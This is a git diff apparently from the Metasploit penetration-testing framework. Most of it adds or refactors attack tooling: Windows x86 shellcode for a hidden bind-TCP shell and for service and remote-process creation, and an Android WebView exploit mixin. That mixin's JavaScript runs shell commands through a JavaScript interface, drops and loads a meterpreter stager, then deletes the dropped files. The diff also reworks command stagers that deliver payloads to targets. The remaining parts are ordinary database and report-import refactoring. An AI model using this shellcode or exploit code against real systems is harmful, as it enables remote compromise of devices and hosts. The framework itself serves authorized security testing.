+mov ecx, esp	;SVCNAME
+lea eax, [edi+0x3];SvcCtrlHandler
+push 0x00000000
+push eax
+push ecx
+push 0x5244AA0B
+call ebp		;RegisterServiceCtrlHandlerExA
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000001
+push 0x00000010
+mov ecx, esp
+push 0x00000000
+push ecx
+push eax
+push 0x7D3755C6
+call ebp		;SetServiceStatus RUNNING
+push 0x0
+push 0x56a2b5f0
+call ebp 		;ExitProcess
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm b/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm
new file mode 100644
index 0000000000..2c44b3dbad
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm
@@ -0,0 +1,16 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 307 bytes
+; Build: >build.py single_create_remote_process
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+  cld                    ; Clear the direction flag.
+  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start:                   ;
+  pop ebp                ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_create_remote_process.asm"
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
new file mode 100644
index 0000000000..2de5d9a021
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
@@ -0,0 +1,23 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 448 bytes
+; Build: >build.py single_service_stuff
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+  cld                    ; Clear the direction flag.
+  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start:                   ;
+  pop ebp                ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_service.asm"
+%include "./src/block/block_service_change_description.asm"
+%include "./src/block/block_create_remote_process.asm"
+%include "./src/block/block_service_stopped.asm"
+
+push edi
+push 0x56A2B5F0
+call ebp		;call ExitProcess(0)
diff --git a/external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm b/external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm
new file mode 100644
index 0000000000..cb2a14a38a
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/single/single_shell_hidden_bind_tcp.asm
@@ -0,0 +1,20 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (28 July 2009)
+; Size: 341 bytes
+; Build: >build.py single_shell_bind_tcp
+;-----------------------------------------------------------------------------;
+[BITS 32]
+[ORG 0]
+
+  cld                    ; Clear the direction flag.
+  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start:                   ;
+  pop ebp                ; Pop off the address of 'api_call' for calling later.
+%include "./src/block/block_hidden_bind_tcp.asm"
+  ; By here we will have performed the bind_tcp connection and EDI will be out socket.
+%include "./src/block/block_shell.asm"
+	; Finish up with the EXITFUNK.
+%include "./src/block/block_exitfunk.asm"
diff --git a/lib/msf/core/auxiliary/auth_brute.rb b/lib/msf/core/auxiliary/auth_brute.rb
index dc70d93349..dbe155321c 100644
--- a/lib/msf/core/auxiliary/auth_brute.rb
+++ b/lib/msf/core/auxiliary/auth_brute.rb
@@ -330,6 +330,9 @@ module Auxiliary::AuthBrute
     end
 
     creds = [ [], [], [], [] ] # userpass, pass, user, rest
+    remaining_pairs = combined_array.length # counter for our occasional output
+    interval = 60 # seconds between each remaining pair message reported to user
+    next_message_time = Time.now + interval # initial timing interval for user message
     # Move datastore['USERNAME'] and datastore['PASSWORD'] to the front of the list.
     # Note that we cannot tell the user intention if USERNAME or PASSWORD is blank --
     # maybe (and it's often) they wanted a blank. One more credential won't kill
@@ -344,6 +347,14 @@ module Auxiliary::AuthBrute
       else
         creds[3] << pair
       end
+      if Time.now > next_message_time
+        print_brute(
+          :level => :vstatus,
+          :msg => "Pair list is still building with #{remaining_pairs} pairs left to process"
+        )
+        next_message_time = Time.now + interval
+      end
+      remaining_pairs -= 1
     end
     return creds[0] + creds[1] + creds[2] + creds[3]
   end
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index c74b205f0b..33db0e6a54 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
@@ -2172,35 +2172,63 @@ class DBManager
   end
 
 
-  #
-  # Find or create a task matching this type/data
-  #
+  # TODO This method does not attempt to find. It just creates
+  # a report based on the passed params.
   def find_or_create_report(opts)
     report_report(opts)
   end
 
+  # Creates a Report based on passed parameters. Does not handle
+  # child artifacts.
+  # @param opts [Hash]
+  # @return [Integer] ID of created report
   def report_report(opts)
     return if not active
   ::ActiveRecord::Base.connection_pool.with_connection {
-    wspace = opts.delete(:workspace) || workspace
-    path = opts.delete(:path) || (raise RuntimeError, "A report :path is required")
 
-    ret = {}
-    user      = opts.delete(:user)
-    options   = opts.delete(:options)
-    rtype     = opts.delete(:rtype)
-    report    = wspace.reports.new
-    report.created_by = user
-    report.options = options
-    report.rtype = rtype
-    report.path = path
-    msf_import_timestamps(opts,report)
-    report.save!
+    report = Report.new(opts)
+    unless report.valid?
+      errors = report.errors.full_messages.join('; ')
+      raise RuntimeError "Report to be imported is not valid: #{errors}"
+    end
+    report.state = :complete # Presume complete since it was exported
+    report.save
 
-    ret[:task] = report
+    report.id
   }
   end
 
+  # Creates a ReportArtifact based on passed parameters.
+  # @param opts [Hash] of ReportArtifact attributes
+  def report_artifact(opts)
+    artifacts_dir = Report::ARTIFACT_DIR
+    tmp_path = opts[:file_path]
+    artifact_name = File.basename tmp_path
+    new_path = File.join(artifacts_dir, artifact_name)
+
+    unless File.exists? tmp_path
+      raise DBImportError 'Report artifact file to be imported does not exist.'
+    end
+
+    unless (File.directory?(artifacts_dir) && File.writable?(artifacts_dir))
+      raise DBImportError "Could not move report artifact file to #{artifacts_dir}."
+    end
+
+    if File.exists? new_path
+      unique_basename = "#{(Time.now.to_f*1000).to_i}_#{artifact_name}"
+      new_path = File.join(artifacts_dir, unique_basename)
+    end
+
+    FileUtils.copy(tmp_path, new_path)
+    opts[:file_path] = new_path
+    artifact = ReportArtifact.new(opts)
+    unless artifact.valid?
+      errors = artifact.errors.full_messages.join('; ')
+      raise RuntimeError "Artifact to be imported is not valid: #{errors}"
+    end
+    artifact.save
+  end
+
   #
   # This methods returns a list of all reports in the database
   #
@@ -2915,10 +2943,41 @@ class DBManager
     self.send "import_#{ftype}".to_sym, args, &block
   end
 
-  # Returns one of: :nexpose_simplexml :nexpose_rawxml :nmap_xml :openvas_xml
-  # :nessus_xml :nessus_xml_v2 :qualys_scan_xml, :qualys_asset_xml, :msf_xml :nessus_nbe :amap_mlog
-  # :amap_log :ip_list, :msf_zip, :libpcap, :foundstone_xml, :acunetix_xml, :appscan_xml
-  # :burp_session, :ip360_xml_v3, :ip360_aspl_xml, :nikto_xml, :outpost24_xml
+  # Returns one of the following:
+  #
+  # :acunetix_xml
+  # :amap_log
+  # :amap_mlog
+  # :appscan_xml
+  # :burp_session_xml
+  # :ci_xml
+  # :foundstone_xml
+  # :fusionvm_xml
+  # :ip360_aspl_xml
+  # :ip360_xml_v3
+  # :ip_list
+  # :libpcap
+  # :mbsa_xml
+  # :msf_pwdump
+  # :msf_xml
+  # :msf_zip
+  # :nessus_nbe
+  # :nessus_xml
+  # :nessus_xml_v2
+  # :netsparker_xml
+  # :nexpose_rawxml
+  # :nexpose_simplexml
+  # :nikto_xml
+  # :nmap_xml
+  # :openvas_new_xml
+  # :openvas_xml
+  # :outpost24_xml
+  # :qualys_asset_xml
+  # :qualys_scan_xml
+  # :retina_xml
+  # :spiceworks_csv
+  # :wapiti_xml
+  #
   # If there is no match, an error is raised instead.
   def import_filetype_detect(data)
 
@@ -3086,7 +3145,7 @@ class DBManager
       return :netsparker_xml
     elsif (firstline.index("# Metasploit PWDump Export"))
       # then it's a Metasploit PWDump export
-      @import_filedata[:type] = "msf_pwdump"
+      @import_filedata[:type] = "Metasploit PWDump Export"
       return :msf_pwdump
     end
 
@@ -3793,43 +3852,55 @@ class DBManager
 
     # Import Reports
     doc.elements.each("/#{btag}/reports/report") do |report|
-      tmp = args[:ifd][:zip_tmp]
-      report_info              = {}
-      report_info[:workspace]  = args[:wspace]
-      # Should user be imported (original) or declared (the importing user)?
-      report_info[:user]       = nils_for_nulls(report.elements["created-by"].text.to_s.strip)
-      report_info[:options]    = nils_for_nulls(report.elements["options"].text.to_s.strip)
-      report_info[:rtype]      = nils_for_nulls(report.elements["rtype"].text.to_s.strip)
-      report_info[:created_at] = nils_for_nulls(report.elements["created-at"].text.to_s.strip)
-      report_info[:updated_at] = nils_for_nulls(report.elements["updated-at"].text.to_s.strip)
-      report_info[:orig_path]  = nils_for_nulls(report.elements["path"].text.to_s.strip)
-      report_info[:task]       = args[:task]
-      report_info[:orig_path].gsub!(/^\./, tmp) if report_info[:orig_path]
-
-      # Only report a report if we actually have it.
-      # TODO: Copypasta. Seperate this out.
-      if ::File.exists? report_info[:orig_path]
-        reports_dir = ::File.join(basedir,"reports")
-        report_file = ::File.split(report_info[:orig_path]).last
-        if ::File.exists? reports_dir
-          unless (::File.directory?(reports_dir) && ::File.writable?(reports_dir))
-            raise DBImportError.new("Could not move files to #{reports_dir}")
-          end
-        else
-          ::FileUtils.mkdir_p(reports_dir)
-        end
-        new_report = ::File.join(reports_dir,report_file)
-        report_info[:path] = new_report
-        if ::File.exists?(new_report)
-          ::File.unlink new_report
-        else
-          report_report(report_info)
-        end
-        ::FileUtils.copy(report_info[:orig_path], new_report)
-        yield(:msf_report, new_report) if block
-      end
+      import_report(report, args, basedir)
     end
+  end
 
+  # @param report [REXML::Element] to be imported
+  # @param args [Hash]
+  # @param base_dir [String]
+  def import_report(report, args, base_dir)
+    tmp = args[:ifd][:zip_tmp]
+    report_info = {}
+
+    report.elements.each do |e|
+      node_name  = e.name
+      node_value = e.text
+
+      # These need to be converted back to arrays:
+      array_attrs = %w|addresses file-formats options sections|
+      if array_attrs.member? node_name
+        node_value = JSON.parse(node_value)
+      end
+      # Don't restore these values:
+      skip_nodes = %w|id workspace-id artifacts|
+      next if skip_nodes.member? node_name
+
+      report_info[node_name.parameterize.underscore.to_sym] = node_value
+    end
+    # Use current workspace
+    report_info[:workspace_id] = args[:wspace].id
+
+    # Create report, need new ID to record artifacts
+    report_id = report_report(report_info)
+
+    # Handle artifacts
+    report.elements['artifacts'].elements.each do |artifact|
+      artifact_opts = {}
+      artifact.elements.each do |attr|
+        skip_nodes = %w|id accessed-at|
+        next if skip_nodes.member? attr.name
+
+        symboled_attr = attr.name.parameterize.underscore.to_sym
+        artifact_opts[symboled_attr] = attr.text
+      end
+      # Use new Report as parent
+      artifact_opts[:report_id] = report_id
+      # Update to full path
+      artifact_opts[:file_path].gsub!(/^\./, tmp)
+
+      report_artifact(artifact_opts)
+    end
   end
 
   # Convert the string "NULL" to actual nil
@@ -4222,7 +4293,10 @@ class DBManager
     parser = Rex::Parser::RetinaXMLStreamParser.new
     parser.on_found_host = Proc.new do |host|
       hobj = nil
-      data = {:workspace => wspace}
+      data = {
+        :workspace => wspace,
+        :task      => args[:task]
+      }
       addr = host['address']
       next if not addr
 
diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb
index 52d3eac6d5..bc38515141 100644
--- a/lib/msf/core/db_manager.rb
+++ b/lib/msf/core/db_manager.rb
@@ -678,7 +678,7 @@ class DBManager
         union.or(condition)
       }
 
-      query = query.where(unioned_conditions).uniq
+      query = query.where(unioned_conditions).to_a.uniq { |m| m.fullname }
     end
 
     query
diff --git a/lib/msf/core/db_manager/import_msf_xml.rb b/lib/msf/core/db_manager/import_msf_xml.rb
index f3e37b2268..8d70b5e1d0 100644
--- a/lib/msf/core/db_manager/import_msf_xml.rb
+++ b/lib/msf/core/db_manager/import_msf_xml.rb
@@ -204,6 +204,7 @@ module Msf
 
         doc.elements.each("/#{btag}/hosts/host") do |host|
           host_data = {}
+          host_data[:task] = args[:task]
           host_data[:workspace] = wspace
           host_data[:host] = nils_for_nulls(host.elements["address"].text.to_s.strip)
           if bl.include? host_data[:host]
@@ -247,6 +248,7 @@ module Msf
 
           host.elements.each('services/service') do |service|
             service_data = {}
+            service_data[:task] = args[:task]
             service_data[:workspace] = wspace
             service_data[:host] = hobj
             service_data[:port] = nils_for_nulls(service.elements["port"].text.to_s.strip).to_i
diff --git a/lib/msf/core/exploit/android.rb b/lib/msf/core/exploit/android.rb
new file mode 100644
index 0000000000..8f2bd4f76d
--- /dev/null
+++ b/lib/msf/core/exploit/android.rb
@@ -0,0 +1,101 @@
+# -*- coding: binary -*-
+require 'msf/core'
+
+module Msf
+module Exploit::Android
+
+  # Since the NDK stager is used, arch detection must be performed
+  SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE, ARCH_X86 ]
+
+  # Most android devices are ARM
+  DEFAULT_ARCH = ARCH_ARMLE
+
+  # Some of the default NDK build targets are named differently than
+  # msf's builtin constants. This mapping allows the ndkstager file
+  # to be looked up from the msf constant.
+  NDK_FILES = {
+    ARCH_ARMLE  => 'armeabi',
+    ARCH_MIPSLE => 'mips'
+  }
+
+  def add_javascript_interface_exploit_js(arch)
+    stagename = Rex::Text.rand_text_alpha(5)
+    script = %Q|
+      function exec(runtime, cmdArr) {
+        var ch = 0;
+        var output = '';
+        var process = runtime.exec(cmdArr);
+        var input = process.getInputStream();
+
+        while ((ch = input.read()) > 0) { output += String.fromCharCode(ch); }
+        return output;
+      }
+
+      function attemptExploit(obj) {
+        // ensure that the object contains a native interface
+        try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
+
+        // get the pid
+        var pid = obj.getClass()
+                     .forName('android.os.Process')
+                     .getMethod('myPid', null)
+                     .invoke(null, null);
+
+        // get the runtime so we can exec
+        var runtime = obj.getClass()
+                         .forName('java.lang.Runtime')
+                         .getMethod('getRuntime', null)
+                         .invoke(null, null);
+
+        // libraryData contains the bytes for a native shared object built via NDK
+        // which will load the "stage", which in this case is our android meterpreter stager.
+        // LibraryData is loaded via ajax later, because we have to access javascript in
+        // order to detect what arch we are running.
+        var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
+
+        // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
+        // another stager which loads android meterpreter from the msf handler.
+        var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";
+
+        // get the process name, which will give us our data path
+        // $PPID does not seem to work on android 4.0, so we concat pids manually
+        var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
+
+        var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
+        var stagePath = path + '/#{stagename}.apk';
+
+        // build the library and chmod it
+        runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();
+        runtime.exec(['chmod', '700', libraryPath]).waitFor();
+
+        // build the stage, chmod it, and load it
+        runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
+        runtime.exec(['chmod', '700', stagePath]).waitFor();
+
+        // load the library
+        runtime.load(libraryPath);
+
+        // delete dropped files
+        runtime.exec(['rm', stagePath]).waitFor();
+        runtime.exec(['rm', libraryPath]).waitFor();
+
+        return true;
+      }
+
+      for (i in top) { if (attemptExploit(top[i]) === true) break; }
+    |
+
+    # remove comments and empty lines
+    script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '')
+  end
+
+
+  # The NDK stager is used to launch a hidden APK
+  def ndkstager(stagename, arch)
+    localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so')
+    data = File.read(localfile, :mode => 'rb')
+    data.gsub!('PLOAD', stagename)
+  end
+
+end
+end
diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
index cf4b251161..7dcc3c43bb 100644
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -5,93 +5,315 @@ require 'msf/core/exploit/exe'
 
 module Msf
 
-###
-#
 # This mixin provides an interface to generating cmdstagers
-#
-###
 module Exploit::CmdStager
 
   include Msf::Exploit::EXE
 
+  # Constant for stagers - used when creating an stager instance.
+  STAGERS = {
+    :bourne => Rex::Exploitation::CmdStagerBourne,
+    :debug_asm => Rex::Exploitation::CmdStagerDebugAsm,
+    :debug_write => Rex::Exploitation::CmdStagerDebugWrite,
+    :echo => Rex::Exploitation::CmdStagerEcho,
+    :printf => Rex::Exploitation::CmdStagerPrintf,
+    :vbs => Rex::Exploitation::CmdStagerVBS,
+    :vbs_adodb => Rex::Exploitation::CmdStagerVBS,
+    :tftp => Rex::Exploitation::CmdStagerTFTP
+  }
+
+  # Constant for decoders - used when checking the default flavor decoder.
+  DECODERS = {
+    :debug_asm => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm"),
+    :debug_write => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write"),
+    :vbs => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64"),
+    :vbs_adodb => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")
+  }
+
+  attr_accessor :stager_instance
+  attr_accessor :cmd_list
+  attr_accessor :flavor
+  attr_accessor :decoder
+  attr_accessor :exe
+
+  # Creates an instance of an exploit that uses an CMD Stager and register the
+  # datastore options provided by the mixin.
   #
-  # Creates an instance of an exploit that uses an CmdStager overwrite.
-  #
+  # @param info [Hash] Hash containing information to initialize the exploit.
+  # @return [Msf::Module::Exploit] the exploit module.
   def initialize(info = {})
     super
-    @cmd_list = nil
-    @stager_instance = nil
+
+    flavors = module_flavors
+    flavors = STAGERS.keys if flavors.empty?
+    flavors.unshift('auto')
+
+    register_advanced_options(
+      [
+        OptEnum.new('CMDSTAGER::FLAVOR', [false, 'The CMD Stager to use.', 'auto', flavors]),
+        OptString.new('CMDSTAGER::DECODER', [false, 'The decoder stub to use.'])
+      ], self.class)
   end
 
 
+  # Executes the command stager while showing the progress. This method should
+  # be called from exploits using this mixin.
   #
-  # Execute the command stager while showing the progress
-  #
+  # @param opts [Hash] Hash containing configuration options. Also allow to
+  #   send opts to the Rex::Exploitation::CmdStagerBase constructor.
+  # @option opts :flavor [Symbol] The CMD Stager to use.
+  # @option opts :decoder [Symbol] The decoder stub to use.
+  # @option opts :delay [Float] Delay between command executions.
+  # @return [void]
   def execute_cmdstager(opts = {})
-    cmd_list = generate_cmdstager(opts)
+    self.cmd_list = generate_cmdstager(opts)
 
-    execute_cmdstager_begin(opts)
+    stager_instance.setup(self)
 
-    sent = 0
-    total_bytes = 0
-    cmd_list.each { |cmd| total_bytes += cmd.length }
+    begin
+      execute_cmdstager_begin(opts)
 
-    delay = opts[:delay]
-    delay ||= 0.25
+      sent = 0
+      total_bytes = 0
+      cmd_list.each { |cmd| total_bytes += cmd.length }
 
-    cmd_list.each do |cmd|
-      execute_command(cmd, opts)
-      sent += cmd.length
+      delay = opts[:delay]
+      delay ||= 0.25
 
-      # In cases where a server has multiple threads, we want to be sure that
-      # commands we execute happen in the correct (serial) order.
-      ::IO.select(nil, nil, nil, delay)
+      cmd_list.each do |cmd|
+        execute_command(cmd, opts)
+        sent += cmd.length
 
-      progress(total_bytes, sent)
+        # In cases where a server has multiple threads, we want to be sure that
+        # commands we execute happen in the correct (serial) order.
+        ::IO.select(nil, nil, nil, delay)
+
+        progress(total_bytes, sent)
+      end
+
+      execute_cmdstager_end(opts)
+    ensure
+      stager_instance.teardown(self)
     end
-
-    execute_cmdstager_end(opts)
   end
 
 
-  #
   # Generates a cmd stub based on the current target's architecture
-  # and operating system.
+  # and platform.
   #
+  # @param opts [Hash] Hash containing configuration options. Also allow to
+  #   send opts to the Rex::Exploitation::CmdStagerBase constructor.
+  # @option opts :flavor [Symbol] The CMD Stager to use.
+  # @option opts :decoder [Symbol] The decoder stub to use.
+  # @param pl [String] String containing the payload to execute
+  # @return [Array] The list of commands to execute
+  # @raise [ArgumentError] raised if the cmd stub can not be generated
   def generate_cmdstager(opts = {}, pl = nil)
-    pl ||= payload.encoded
+    select_cmdstager(opts)
 
-    @exe = generate_payload_exe
+    self.exe = generate_payload_exe(:code => pl)
 
-    @stager_instance = create_stager(@exe)
-    cmd_list = @stager_instance.generate(opts)
+    self.stager_instance = create_stager
+    cmd_list = stager_instance.generate(opts_with_decoder(opts))
 
-    if (cmd_list.nil? or cmd_list.length < 1)
+    if (cmd_list.nil? || cmd_list.length < 1)
       print_error("The command stager could not be generated")
       raise ArgumentError
     end
 
-    @cmd_list = cmd_list
+    cmd_list
   end
 
-
-  #
-  # Show the progress of the upload
+  # Show the progress of the upload while cmd staging
   #
+  # @param total [Float] The total number of bytes to send
+  # @param sent [Float] The number of bytes sent
+  # @return [void]
   def progress(total, sent)
     done = (sent.to_f / total.to_f) * 100
     percent = "%3.2f%%" % done.to_f
     print_status("Command Stager progress - %7s done (%d/%d bytes)" % [percent, sent, total])
   end
 
+  # Selects the correct cmd stager and decoder stub to use
   #
-  # Methods to override - not used internally
+  # @param opts [Hash] Hash containing the options to select te correct cmd
+  #   stager and decoder.
+  # @option opts :flavor [Symbol] The cmd stager to use.
+  # @option opts :decoder [Symbol] The decoder stub to use.
+  # @return [void]
+  # @raise [ArgumentError] raised if a cmd stager can not be selected or it
+  #   isn't compatible with the target platform.
+  def select_cmdstager(opts = {})
+    self.flavor = select_flavor(opts)
+    raise ArgumentError, "Unable to select CMD Stager" if flavor.nil?
+    raise ArgumentError, "The CMD Stager '#{flavor}' isn't compatible with the target" unless compatible_flavor?(flavor)
+    self.decoder = select_decoder(opts)
+  end
+
+
+  # Returns a hash with the :decoder option if possible
   #
+  # @params opts [Hash] Input Hash.
+  # @return [Hash] Hash with the input data and a :decoder option when
+  #   possible.
+  def opts_with_decoder(opts = {})
+    return opts if opts.include?(:decoder)
+    return opts.merge(:decoder => decoder) if decoder
+    opts
+  end
+
+
+  # Create an instance of the flavored stager.
+  #
+  # @return [Rex::Exploitation::CmdStagerBase] The cmd stager to use.
+  # @raise [NoMethodError] raised if the flavor doesn't exist.
+  def create_stager
+    STAGERS[flavor].new(exe)
+  end
+
+  # Returns the default decoder stub for the input flavor.
+  #
+  # @param f [Symbol] the input flavor.
+  # @return [Symbol] the decoder.
+  # @return [nil] if there isn't a default decoder to use for the current
+  #   cmd stager flavor.
+  def default_decoder(f)
+    DECODERS[f]
+  end
+
+  # Selects the correct cmd stager decoder to use based on three rules: (1) use
+  # the decoder provided in input options, (2) use the decoder provided by the
+  # user through datastore options, (3) select the default decoder for the
+  # current cmd stager flavor if available.
+  #
+  # @param opts [Hash] Hash containing the options to select te correct
+  #   decoder.
+  # @option opts :decoder [String] The decoder stub to use.
+  # @return [String] The decoder.
+  # @return [nil] if a decoder can not be selected.
+  def select_decoder(opts = {})
+    return opts[:decoder] if opts.include?(:decoder)
+    return datastore['CMDSTAGER::DECODER'] unless datastore['CMDSTAGER::DECODER'].blank?
+    default_decoder(flavor)
+  end
+
+  # Selects the correct cmd stager to use based on three rules: (1) use the
+  # flavor provided in options, (2) use the flavor provided by the user
+  # through datastore options, (3) guess the flavor using the target platform.
+  #
+  # @param opts [Hash] Hash containing the options to select te correct cmd
+  #   stager
+  # @option opts :flavor [Symbol] The cmd stager flavor to use.
+  # @return [Symbol] The flavor to use.
+  # @return [nil] if a flavor can not be selected.
+  def select_flavor(opts = {})
+    return opts[:flavor].to_sym if opts.include?(:flavor)
+    unless datastore['CMDSTAGER::FLAVOR'].blank? or datastore['CMDSTAGER::FLAVOR'] == 'auto'
+      return datastore['CMDSTAGER::FLAVOR'].to_sym
+    end
+    guess_flavor
+  end
+
+  # Guess the cmd stager flavor to use using information from the module,
+  # target or platform.
+  #
+  # @return [Symbol] The cmd stager flavor to use.
+  # @return [nil] if the cmd stager flavor can not be guessed.
+  def guess_flavor
+    # First try to guess a compatible flavor based on the module & target information.
+    unless target_flavor.nil?
+      case target_flavor.class.to_s
+      when 'Array'
+        return target_flavor[0].to_sym
+      when 'String'
+        return target_flavor.to_sym
+      when 'Symbol'
+        return target_flavor
+      end
+    end
+
+    # Second try to guess a compatible flavor based on the target platform.
+    return nil unless target_platform.names.length == 1
+    c_platform = target_platform.names.first
+    case c_platform
+    when /linux/i
+      :bourne
+    when /osx/i
+      :bourne
+    when /unix/i
+      :bourne
+    when /win/i
+      :vbs
+    else
+      nil
+    end
+  end
+
+  # Returns all the compatible stager flavors specified by the module and each
+  # of it's targets.
+  #
+  # @return [Array] the list of all compatible cmd stager flavors.
+  def module_flavors
+    flavors = []
+    flavors += Array(module_info['CmdStagerFlavor']) if module_info['CmdStagerFlavor']
+    targets.each do |target|
+      flavors += Array(target.opts['CmdStagerFlavor']) if target.opts['CmdStagerFlavor']
+    end
+    flavors.uniq!
+    flavors.map { |flavor| flavor.to_s }
+  end
+
+  # Returns the compatible stager flavors for the current target or module.
+  #
+  # @return [Array] the list of compatible cmd stager flavors.
+  # @return [Symbol] the compatible cmd stager flavor.
+  # @return [String] the compatible cmd stager flavor.
+  # @return [nil] if there isn't any compatible flavor defined.
+  def target_flavor
+    return target.opts['CmdStagerFlavor'] if target && target.opts['CmdStagerFlavor']
+    return module_info['CmdStagerFlavor'] if module_info['CmdStagerFlavor']
+    nil
+  end
+
+  # Answers if the input flavor is compatible with the current target or module.
+  #
+  # @param f [Symbol] The flavor to check
+  # @returns  [Boolean] true if compatible, false otherwise.
+  def compatible_flavor?(f)
+    return true if target_flavor.nil?
+    case target_flavor.class.to_s
+    when 'String'
+      return true if target_flavor == f.to_s
+    when 'Array'
+      target_flavor.each { |tr| return true if tr.to_sym == f }
+    when 'Symbol'
+      return true if target_flavor == f
+    end
+    false
+  end
+
+  # Code to execute before the cmd stager stub. This method is designed to be
+  # overriden by a module this mixin.
+  #
+  # @param opts [Hash] Hash of configuration options.
   def execute_cmdstager_begin(opts)
   end
+
+  # Code to execute after the cmd stager stub. This method is designed to be
+  # overriden by a module this mixin.
+  #
+  # @param opts [Hash] Hash of configuration options.
   def execute_cmdstager_end(opts)
   end
 
-end
+  # Code to execute each command from the. This method is designed to be
+  # overriden by a module using this mixin.
+  #
+  # @param opts [Hash] Hash of configuration options.
+  def execute_command(cmd, opts)
+    raise NotImplementedError
+  end
 
 end
+end
diff --git a/lib/msf/core/exploit/cmdstager_bourne.rb b/lib/msf/core/exploit/cmdstager_bourne.rb
deleted file mode 100644
index f4859105c7..0000000000
--- a/lib/msf/core/exploit/cmdstager_bourne.rb
+++ /dev/null
@@ -1,21 +0,0 @@
-# -*- coding: binary -*-
-
-require 'msf/core/exploit/cmdstager'
-
-module Msf
-
-###
-#
-# This mixin provides an interface for staging cmd to arbitrary payloads
-#
-###
-module Exploit::CmdStagerBourne
-
-  include Msf::Exploit::CmdStager
-
-  def create_stager(exe)
-    Rex::Exploitation::CmdStagerBourne.new(exe)
-  end
-end
-
-end
diff --git a/lib/msf/core/exploit/cmdstager_debug_asm.rb b/lib/msf/core/exploit/cmdstager_debug_asm.rb
deleted file mode 100644
index acaeed53d0..0000000000
--- a/lib/msf/core/exploit/cmdstager_debug_asm.rb
+++ /dev/null
@@ -1,41 +0,0 @@
-# -*- coding: binary -*-
-
-require 'msf/core/exploit/cmdstager'
-
-module Msf
-
-###
-#
-# This mixin provides an interface for staging cmd to arbitrary payloads
-#
-###
-module Exploit::CmdStagerDebugAsm
-
-  include Msf::Exploit::CmdStager
-
-  def initialize(info = {})
-    super
-
-    register_advanced_options(
-      [
-        OptString.new( 'DECODERSTUB',  [ true, 'The debug.exe assembly listing decoder stub to use.',
-          File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_asm")]),
-      ], self.class)
-  end
-
-  def create_stager(exe)
-    Rex::Exploitation::CmdStagerDebugAsm.new(exe)
-  end
-
-  def execute_cmdstager(opts = {})
-    opts.merge!({ :decoder => datastore['DECODERSTUB'] })
-    super
-  end
-
-  def generate_cmdstager(opts = {}, pl = nil)
-    opts.merge!({ :decoder => datastore['DECODERSTUB'] })
-    super
-  end
-end
-
-end
diff --git a/lib/msf/core/exploit/cmdstager_debug_write.rb b/lib/msf/core/exploit/cmdstager_debug_write.rb
deleted file mode 100644
index 53ded3ab55..0000000000
--- a/lib/msf/core/exploit/cmdstager_debug_write.rb
+++ /dev/null
@@ -1,41 +0,0 @@
-# -*- coding: binary -*-
-
-require 'msf/core/exploit/cmdstager'
-
-module Msf
-
-###
-#
-# This mixin provides an interface for staging cmd to arbitrary payloads
-#
-###
-module Exploit::CmdStagerDebugWrite
-
-  include Msf::Exploit::CmdStager
-
-  def initialize(info = {})
-    super
-
-    register_advanced_options(
-      [
-        OptString.new( 'DECODERSTUB',  [ true, 'The debug.exe file-writing decoder stub to use.',
-          File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_write")]),
-      ], self.class)
-  end
-
-  def create_stager(exe)
-    Rex::Exploitation::CmdStagerDebugWrite.new(exe)
-  end
-
-  def execute_cmdstager(opts = {})
